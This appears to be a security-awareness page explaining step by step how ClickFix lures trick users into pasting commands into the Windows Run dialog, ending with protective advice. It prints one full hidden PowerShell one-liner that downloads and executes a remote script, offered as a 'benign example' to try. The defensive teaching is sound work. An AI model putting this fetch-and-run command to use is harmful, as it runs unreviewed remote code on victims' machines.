How ClickFix Works

ClickFix is a social engineering attack that tricks you into running malicious code on your own computer. Here's exactly how it works, step by step.

Step 1

You Visit a Compromised Website

You might click a link in an email, a search result, or even visit a legitimate website that's been hacked. The page looks normal at first, but then something appears to go wrong.

Common Scenarios:

  • Fake CAPTCHA: "Verify you are human" (often mimics Cloudflare)
  • Browser Update: "Chrome is missing a critical security update"
  • Google Meet/Zoom: "Microphone format not supported - fix to join"
  • FileFix: "Display Error - paste path into File Explorer to fix"
  • ConsentFix: "Verify identity to access document" (OAuth abuse)
Step 2

The Website Presents You Fake "Fix" Instructions

A prompt appears with very specific instructions. It usually says something like:

1. Press the Windows key and R key at the same time

2. Press Ctrl + V to paste

3. Press Enter

Why this is dangerous:

The Win + R combination opens the Windows "Run" dialog, which is a powerful system tool. It can run any program or command on your computer. When you press Ctrl + V, you're pasting a command that the malicious website secretly copied to your clipboard.

Step 3

You Inadvertantly Execute a Malicious Command

When you paste and press Enter, you're running a command that looks something like this:

Benign Example (Try running this safely)

        1
        powershell -windowstyle hidden -ExecutionPolicy Bypass -Command "IEX(New-Object Net.WebClient).DownloadString('https://clickfix.fyi/static/example.ps1')"

What each part does:

powershell
Launches PowerShell, a powerful command-line tool built into Windows
-windowstyle hidden
Hides the window so you don't see what's happening
-ExecutionPolicy Bypass
Disables Windows security features that would normally block suspicious scripts
IEX
Short for "Invoke-Expression" - runs whatever code comes next
New-Object Net.WebClient
Creates a tool to download files from the internet
DownloadString('hxxps://...')
Downloads a malicious script from the attacker's server and runs it immediately
Step 4

The Malware Runs on Your Computer

The downloaded script typically does one or more of the following:

  • Steals your passwords - Searches your browser's saved passwords and sends them to the attacker
  • Steals your cookies - Takes your login sessions so the attacker can access your accounts
  • Searches for cryptocurrency wallets - Looks for Bitcoin, Ethereum, and other crypto wallet files
  • Takes screenshots - Captures what's on your screen
  • Installs a backdoor - Gives the attacker permanent remote access to your computer

Real Malware Families Distributed via ClickFix:

  • Lumma Stealer - The most common payload in 2025. Steals passwords, session cookies, and crypto wallets.
  • DarkGate - A sophisticated loader used by groups like Storm-0249 to deploy ransomware.
  • AsyncRAT - Open-source remote access tool modified for surveillance.
  • StealC - A lightweight stealer often dropped via "FileFix" lures.

How to Protect Yourself

  1. Never paste commands from websites - No legitimate website will ever ask you to open the Run dialog and paste a command
  2. Be suspicious of "fix" instructions - Real technical problems don't get fixed by pasting mysterious commands
  3. Check the URL - Real Google, Microsoft, or Facebook pages won't show these prompts
  4. When in doubt, close the tab - If something feels off, just close the browser tab and navigate to the site directly

See it in Action

Try our safe, interactive demo to see what a ClickFix attack looks like.

View Interactive Demo